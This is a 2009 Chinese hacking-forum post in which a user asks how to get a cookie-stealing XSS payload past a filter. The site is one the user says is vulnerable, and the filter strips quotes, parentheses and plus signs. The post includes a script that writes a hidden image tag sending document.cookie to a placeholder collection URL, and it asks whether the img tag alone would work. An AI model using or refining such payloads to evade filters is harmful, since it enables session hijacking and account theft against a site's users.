标题:
求教部分过滤的XSS脚本攻击解决办法
[打印本页]
作者:
FirePan
时间:
2009-5-8 15:42
标题:
求教部分过滤的XSS脚本攻击解决办法
<!-- <script>document.write('<img src="http://url/news.asp?msg='+document.cookie+'" width=0 height=0 border=0 />');</script> -->
用以上语句获取COOKIE时,' () +被过滤了,是否有办法突破?(已知有XSS漏洞)
只用<img。。。。。。。。/>这段能否达到目的?与加上JS的语句有什么区别?
欢迎光临 【3.A.S.T】网络安全爱好者 (http://3ast.com./)
Powered by Discuz! 7.2